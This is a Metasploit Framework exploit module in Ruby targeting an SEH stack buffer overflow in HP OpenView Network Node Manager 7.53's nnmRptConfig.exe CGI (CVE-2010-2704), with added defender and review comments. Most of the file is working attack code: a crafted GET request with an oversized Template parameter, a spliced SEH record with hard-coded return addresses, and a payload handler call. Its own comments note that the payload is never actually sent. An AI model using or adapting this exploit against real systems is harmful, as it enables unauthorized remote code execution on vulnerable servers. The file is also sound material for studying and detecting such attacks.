##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	# SEH-based stack buffer overflow in the nnmRptConfig.exe CGI shipped with
	# HP OpenView Network Node Manager 7.53 (CVE-2010-2704; see 'References').
	#
	# Defender notes: the trigger is a single HTTP GET to /OvCgi/nnmRptConfig.exe
	# carrying a ~3 KB 'Template' query parameter, a 10 KB 'Content' parameter
	# and 'DebugSpin=yes' (see #exploit). The module treats a 502 response as
	# the expected outcome (CGI crashed); anything else is reported as unexpected.
	Rank = GreatRanking

	# Version check used by the framework before firing: a HEAD request to the
	# vulnerable CGI whose response must contain the vendor banner.
	HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/nnmRptConfig.exe', :pattern => /Hewlett-Packard Development Company/ }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Seh

	# Registers module metadata (references, payload constraints, targets)
	# and the RPORT option (default 80).
	#
	# NOTE: the =begin/=end lines inside the %q{} description below are part of
	# the string literal, not a Ruby comment, so the "XXX" text is shown to
	# users as module description text.
	#
	# @param info [Hash] base module info merged via +update_info+
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView Network Node Manager nnmRptConfig Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53
				prior to NNM_01207 or NNM_01203 with the SSRT100158 hotfix.

=begin
				XXX: NEEDS MORE DESCRIPTION
=end

			} ,
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2010-2704' ],
					[ 'OSVDB', '66507' ],
					[ 'BID', '41839' ],
					[ 'URL', 'http://www.vupen.com/english/advisories/2010/1866' ],
					[ 'URL', 'http://www.attrition.org/pipermail/vim/2010-July/002374.html' ],
					[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02290344' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024, # buffer size?
					# Every byte outside the alphanumeric set is declared bad, so
					# only alphanumeric-encoded payloads are usable with this module.
					'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric), # (0..0x1f).to_a.pack('C*'),
					#'StackAdjustment' => -3500,
					#'DisableNops'    => true,
					#'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
					#'EncoderOptions' =>
					#	{
					#		'BufferRegister'  => 'ESP'
					#	},
				},
			'Platform'       => 'win',
			# NOTE(review): none of the 'Ret' values below is referenced by
			# #exploit as written (the handler address there is hard-coded), so
			# the selected target currently only changes the name that is printed.
			'Targets'        =>
				[
					[ 'HP OpenView Network Node Manager 7.53',
						{
							'Ret' => 0x5a212a4a # jmp esp in ov.dll (2004-10-05, 294,967 bytes)
						}
					],
					[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',
						{
							'Ret' => 0x71c02b67 # push esp / ret in ws2_32.dll v5.2.3790.3959
						}
					],
					[ 'Debug Target',
						{
							#'Ret' => 0x5a30575b # int3 in ovwww.dll (2007-09-18, 106,558 bytes)
							'Ret' => 0x71c0782c # int3 in ws2_32.dll v5.2.3790.3959
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 20 2010'))

		register_options(
			[
				Opt::RPORT(80),
			], self.class)
	end

	# Builds and sends the single crafted GET request, then invokes the
	# framework payload handler.
	#
	# What is observable on the wire is one request whose 'Template' value is
	# ~3 KB of random bytes with an 8-byte SEH record spliced in, plus a 10 KB
	# 'Content' value and 'DebugSpin=yes'.
	#
	# NOTE(review): +payload.encoded+ appears only inside the =begin/=end block
	# below and is never added to the request in the active code, and
	# +target.ret+ is likewise unused — confirm whether this module is complete.
	#
	# @return [void]
	def exploit

		print_status("Trying target #{target.name}...")

=begin
		# sprintf_new(buf, "   HTTP_COOKIE=%s", bigstr);
		start = '   HTTP_COOKIE='
		start << cookie

		# Offsets from the start of the buffer:
		# ebp @ 5120
		# ret @ 5124
		# seh @ 7044

		buf = rand_text_alphanumeric(5124 - start.length)
		buf << [target.ret].pack('V')
		#buf << "\xcc"
		buf << payload.encoded

		cookie << buf
		cookie << ";"
=end

		# Vulnerable CGI; same path as HttpFingerPrint.
		cgi = '/OvCgi/nnmRptConfig.exe'
		# Presumably the error-message prefix the CGI prepends to the template
		# name; the overflow offset below is measured from the start of that
		# message, so the prefix length is subtracted — verify against the binary.
		start = 'Unable to locate report template: '

		# The CGI calls exit(0) after triggering the bof, so we must use SEH tekniq!
		seh_offset = 2748 - start.length

		#template = Rex::Text.pattern_create(1024*3)
		# 3 KB of random filler that carries the SEH record.
		template = rand_text(1024*3)

		# Characters allowed: AlphaNumeric + '$-_.'
		# 8-byte SEH record: 4-byte next-SEH field followed by the handler address.
		seh_frame = "\x71\x30\x41\x41"
		#seh_frame << "B" * 4
		#seh_frame << [0x5a304f74].pack('V') # cc
		# Handler address is hard-coded here rather than taken from target.ret.
		seh_frame << [0x5a30706c].pack('V') # pop/pop/ret in ovwww.dll

		#template[seh_offset,8] = generate_seh_record(target.ret)
		# Splice the SEH record into the filler at the computed offset.
		template[seh_offset, 8] = seh_frame
		#template[seh_offset,8] = generate_seh_payload(target.ret)

		# Second argument is presumably the response timeout in seconds; a short
		# one is used because the CGI is expected to crash rather than answer.
		res = send_request_cgi({
			'uri'		  => cgi,
			'method'	  => "GET",
			'vars_get' =>
				{
					# 10 KB of 'A' filler; part of the request signature.
					'Content'   => "A" * 10240,
					'Action'    => 'Scheduler',
					'Operation' => 'Stop',
					'Template'  => template,
					# Thanks HP!
					'DebugSpin' => 'yes'
				}
		}, 3)

		# A 502 is the expected result (the CGI died behind the web server);
		# any other response means the request was handled normally, so dump it.
		if res and res.code != 502
			print_error("Eek! We weren't expecting a response, but we got one")
			#if datastore['DEBUG']
				print_error('')
				print_error(res.inspect)
			#end
		end

		# Invoke the framework payload handler.
		handler

	end

end
